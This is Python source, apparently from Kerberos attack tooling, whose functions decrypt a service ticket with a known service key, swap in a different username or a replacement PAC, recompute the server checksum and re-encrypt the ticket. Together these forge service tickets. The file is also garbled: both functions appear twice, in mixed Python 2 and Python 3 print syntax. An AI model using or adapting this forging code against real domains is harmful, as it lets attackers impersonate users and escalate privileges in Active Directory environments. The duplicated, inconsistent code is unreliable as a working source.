def updateusernameinencpart(key,
rawticket,
username,
debug=False,
verbose=False):
try:
ramticket, extra = decoder.decode(rawticket)
serverticket = ramticket.getComponentByPosition(2)
localticket = ramticket.getComponentByPosition(3)
encserverticket = serverticket.getComponentByPosition(
0).getComponentByPosition(3).getComponentByPosition(2).asOctets()
except:
raise ValueError('Unable to decode ticket. Invalid file.')
if verbose: print 'Ticket succesfully decoded'
decserverticketraw, nonce = kerberos.decrypt(key, 2, encserverticket)
a = decoder.decode(decserverticketraw)[0]
a[3][1][0]._value = username
e = encoder.encode(a)
newencserverticket = kerberos.encrypt(key, 2, e, nonce)
ramticket.getComponentByPosition(2).getComponentByPosition(
0).getComponentByPosition(3).getComponentByPosition(
2)._value = newencserverticket
return ramticket
def updatepac(key, rawticket, pac, debug=False, verbose=False):
# attempt decoding of ticket
try:
ramticket, extra = decoder.decode(rawticket)
serverticket = ramticket.getComponentByPosition(2)
localticket = ramticket.getComponentByPosition(3)
encserverticket = serverticket.getComponentByPosition(0).getComponentByPosition(3).getComponentByPosition(2).asOctets()
except:
raise ValueError('Unable to decode ticket. Invalid file.')
if verbose: print('Ticket succesfully decoded')
decserverticketraw, nonce = kerberos.decrypt(key, 2, encserverticket)
if decserverticketraw == None:
raise ValueError('Unable to decrypt ticket. Invalid key.')
elif verbose:
print('Decryption successful')
decserverticket, extra = decoder.decode(decserverticketraw)
#for i in range(len(decserverticket[3])):
# print '---%i---' % i
# print decserverticket[3][i]
# have two here because I was using one to verify that the rewrite matched
# This stuff should be removed, if it is still here Tim forgot...again
origdecserverticket, extra = decoder.decode(decserverticketraw)
# change the validity times in the server ticket
updatetimestampsserverticket(decserverticket, str(decserverticket[5]), str(decserverticket[6]), str(decserverticket[7]), str(decserverticket[8]))
adifrelevant, extra = decoder.decode(decserverticket[9][0][1])
chksum = kerberos.chksum(key, '\x11\x00\x00\x00', pac)
#print 'newchecksum: %s' % chksum.encode('hex')
# repair server checksum
newpac = pac[:-44] + chksum + pac[-28:]
# rebuild AD-IF-RELEVANT
#print adifrelevant
#print dir(adifrelevant.getComponentByPosition(0).getComponentByPosition(1))
adifrelevant.getComponentByPosition(0).getComponentByPosition(1)._value = newpac
#print adifrelevant
decserverticket.getComponentByPosition(9).getComponentByPosition(0).getComponentByPosition(1)._value = encoder.encode(adifrelevant)
# put the ticket back together again
newencserverticket = kerberos.encrypt(key, 2, encoder.encode(decserverticket), nonce)
ramticket.getComponentByPosition(2).getComponentByPosition(0).getComponentByPosition(3).getComponentByPosition(2)._value = newencserverticket
#print decserverticket
return encoder.encode(ramticket)
def updatepac(key, rawticket, pac, debug=False, verbose=False):
# attempt decoding of ticket
try:
ramticket, extra = decoder.decode(rawticket)
serverticket = ramticket.getComponentByPosition(2)
localticket = ramticket.getComponentByPosition(3)
encserverticket = serverticket.getComponentByPosition(0).getComponentByPosition(3).getComponentByPosition(2).asOctets()
except:
raise ValueError('Unable to decode ticket. Invalid file.')
if verbose: print 'Ticket succesfully decoded'
decserverticketraw, nonce = kerberos.decrypt(key, 2, encserverticket)
if decserverticketraw == None:
raise ValueError('Unable to decrypt ticket. Invalid key.')
elif verbose:
print 'Decryption successful'
decserverticket, extra = decoder.decode(decserverticketraw)
#for i in range(len(decserverticket[3])):
# print '---%i---' % i
# print decserverticket[3][i]
# have two here because I was using one to verify that the rewrite matched
# This stuff should be removed, if it is still here Tim forgot...again
origdecserverticket, extra = decoder.decode(decserverticketraw)
# change the validity times in the server ticket
updatetimestampsserverticket(decserverticket, str(decserverticket[5]), str(decserverticket[6]), str(decserverticket[7]), str(decserverticket[8]))
adifrelevant, extra = decoder.decode(decserverticket[9][0][1])
chksum = kerberos.chksum(key, '\x11\x00\x00\x00', pac)
#print 'newchecksum: %s' % chksum.encode('hex')
# repair server checksum
newpac = pac[:-44] + chksum + pac[-28:]
# rebuild AD-IF-RELEVANT
#print adifrelevant
#print dir(adifrelevant.getComponentByPosition(0).getComponentByPosition(1))
adifrelevant.getComponentByPosition(0).getComponentByPosition(1)._value = newpac
#print adifrelevant
decserverticket.getComponentByPosition(9).getComponentByPosition(0).getComponentByPosition(1)._value = encoder.encode(adifrelevant)
# put the ticket back together again
newencserverticket = kerberos.encrypt(key, 2, encoder.encode(decserverticket), nonce)
ramticket.getComponentByPosition(2).getComponentByPosition(0).getComponentByPosition(3).getComponentByPosition(2)._value = newencserverticket
#print decserverticket
return encoder.encode(ramticket)
def updateusernameinencpart(key, rawticket, username, debug=False, verbose=False):
try:
ramticket, extra = decoder.decode(rawticket)
serverticket = ramticket.getComponentByPosition(2)
localticket = ramticket.getComponentByPosition(3)
encserverticket = serverticket.getComponentByPosition(0).getComponentByPosition(3).getComponentByPosition(2).asOctets()
except:
raise ValueError('Unable to decode ticket. Invalid file.')
if verbose: print 'Ticket succesfully decoded'
decserverticketraw, nonce = kerberos.decrypt(key, 2, encserverticket)
a = decoder.decode(decserverticketraw)[0]
a[3][1][0]._value = username
e = encoder.encode(a)
newencserverticket = kerberos.encrypt(key, 2, e, nonce)
ramticket.getComponentByPosition(2).getComponentByPosition(0).getComponentByPosition(3).getComponentByPosition(2)._value = newencserverticket
return ramticket
